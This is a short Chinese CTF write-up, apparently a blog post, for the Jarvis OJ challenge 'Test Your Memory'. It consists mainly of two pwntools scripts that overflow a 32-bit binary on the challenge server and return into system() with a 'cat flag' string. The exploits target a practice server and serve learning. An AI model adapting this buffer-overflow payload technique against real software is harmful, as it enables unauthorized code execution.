[Jarvis OJ - PWN]——Test Your Memory

本文介绍了如何在具有NX保护的32位程序中,利用IDA进行内存绕过,通过IDA的反汇编和payload构造,成功获取flag的远程溢出exploit实例。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

[Jarvis OJ - PWN]——Test Your Memory

exploit

from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
p.recvuntil('\n------Test Your Memory!-------\n\n')
s2 = p.recv(10)
print s2
payload = (s2 + '\x00').ljust(0x13 + 0x4, 'a') 
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()

做绕过检查习惯了,一时间没反应过来
其实直接这样写也可以

from pwn import *
#p = process("./memory")
p = remote("pwn2.jarvisoj.com",9876)
context.log_level = 'debug'
cat_flag_addr = 0x080487E0
sys_addr = 0x080485C9
payload = 'a' * (0x13 +0x4)
payload += p32(sys_addr) + p32(cat_flag_addr)
p.sendlineafter("> ", payload)
p.interactive()

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值